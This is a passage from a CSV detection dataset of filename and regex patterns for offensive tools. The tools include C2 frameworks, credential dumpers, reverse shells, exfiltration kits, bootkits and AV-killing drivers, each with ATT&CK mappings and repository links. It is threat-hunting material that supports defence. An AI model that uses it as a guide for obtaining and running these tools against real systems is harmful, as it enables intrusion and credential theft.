T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","0","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*\badrat.ps1*",".{0,1000}\\badrat\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" 
"*\badrat_cs.exe*",".{0,1000}\\badrat_cs\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*\badrat_server.py*",".{0,1000}\\badrat_server\.py.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*\BadZure*",".{0,1000}\\BadZure.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*\basicKitten.exe*",".{0,1000}\\basicKitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*\beacon.exe*",".{0,1000}\\beacon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. 
including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*\BeaconChannel.cs*",".{0,1000}\\BeaconChannel\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*\BeaconConnector.cs*",".{0,1000}\\BeaconConnector\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*\beacon-in-go.exe*",".{0,1000}\\beacon\-in\-go\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*\beRoot.exe*",".{0,1000}\\beRoot\.exe.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*\beRoot.zip*",".{0,1000}\\BeRoot.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation 
tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*\beroot\modules\*.py*",".{0,1000}\\beroot\\modules\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*\BesoToken.cpp*",".{0,1000}\\BesoToken\.cpp.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*\BesoToken.exe*",".{0,1000}\\BesoToken\.exe.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*\BesoToken.vcxproj*",".{0,1000}\\BesoToken\.vcxproj.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*\BetterSafetyKatz.exe*",".{0,1000}\\BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\bgp_exfil.py*",".{0,1000}\\bgp_exfil\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\bh_owned.py*",".{0,1000}\\bh_owned\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\big_shell_pwd.7z*",".{0,1000}\\big_shell_pwd\.7z.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*\bin\cme.exe*",".{0,1000}\\bin\\cme\.exe.{0,1000}","offensive_tool_keyword","crackmapexec","windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\bin\shepard\*",".{0,1000}\\bin\\shepard\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\bin\uactoken.x86.o*",".{0,1000}\\bin\\uactoken\.x86\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\bin\uactoken2.x64.o*",".{0,1000}\\bin\\uactoken2\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\bin\wmiexec.x64.o*",".{0,1000}\\bin\\wmiexec\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\bin2hex.lua*",".{0,1000}\\bin2hex\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\bindshell.lua*",".{0,1000}\\bindshell\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\BITB-main*",".{0,1000}\\BITB\-main.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2726","467","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z" "*\bitdefender\getCredsbitdefender.h*",".{0,1000}\\bitdefender\\getCredsbitdefender\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" 
"*\bitdefender\getCredsbitdefender2.h*",".{0,1000}\\bitdefender\\getCredsbitdefender2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\bitwarden\plugin\getCredsbitwardenPluginChrome.h*",".{0,1000}\\bitwarden\\plugin\\getCredsbitwardenPluginChrome\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\bitwarden\plugin\getCredsbitwardenPluginChrome2.h*",".{0,1000}\\bitwarden\\plugin\\getCredsbitwardenPluginChrome2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\Blackout.cpp*",".{0,1000}\\Blackout\.cpp.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\Blackout.exe*",".{0,1000}\\Blackout\.exe.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\Blackout.sln*",".{0,1000}\\Blackout\.sln.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\Blackout.sys*",".{0,1000}\\Blackout\.sys.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\Blackout.sys*",".{0,1000}\\Blackout\.sys.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*\Blackout.vcxproj*",".{0,1000}\\Blackout\.vcxproj.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\blindeventlog.exe*",".{0,1000}\\blindeventlog\.exe.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - 
T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*\block_dll_policy.exe*",".{0,1000}\\block_dll_policy\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\BloodHound.exe*",".{0,1000}\\BloodHound\.exe.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*\BloodHoundGui\*.exe*",".{0,1000}\\BloodHoundGui\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. 
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*\BloodHound-win32-X64*",".{0,1000}\\BloodHound\-win32\-X64.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*\BOF-Template\x64\*",".{0,1000}\\BOF\-Template\\x64\\.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*\Boot\EfiGuardDxe.efi*",".{0,1000}\\Boot\\EfiGuardDxe\.efi.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\bootkit-rs*",".{0,1000}\\bootkit\-rs.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","0","N/A","N/A","5","487","58","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*\brc.zip*",".{0,1000}\\brc\.zip.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - 
T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*\BrowserEnum.log*",".{0,1000}\\BrowserEnum\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\BrowserEnum.log*",".{0,1000}\\BrowserEnum\.log.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\BrowserExfelterator.cs*",".{0,1000}\\BrowserExfelterator\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*\browserhistory.csv*",".{0,1000}\\browserhistory\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - 
TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\BrowserLogger.ps1*",".{0,1000}\\BrowserLogger\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\browsinghistoryview\browsinghistoryview64.exe*",".{0,1000}\\browsinghistoryview\\browsinghistoryview64\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\bruteforce-ftp.py*",".{0,1000}\\bruteforce\-ftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\bruteforce-http.py*",".{0,1000}\\bruteforce\-http\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\Bruteforcer.*",".{0,1000}\\Bruteforcer\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*\bruteforce-rdp.py*",".{0,1000}\\bruteforce\-rdp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\bruteforce-smb.py*",".{0,1000}\\bruteforce\-smb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\bruteforce-ssh.py*",".{0,1000}\\bruteforce\-ssh\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
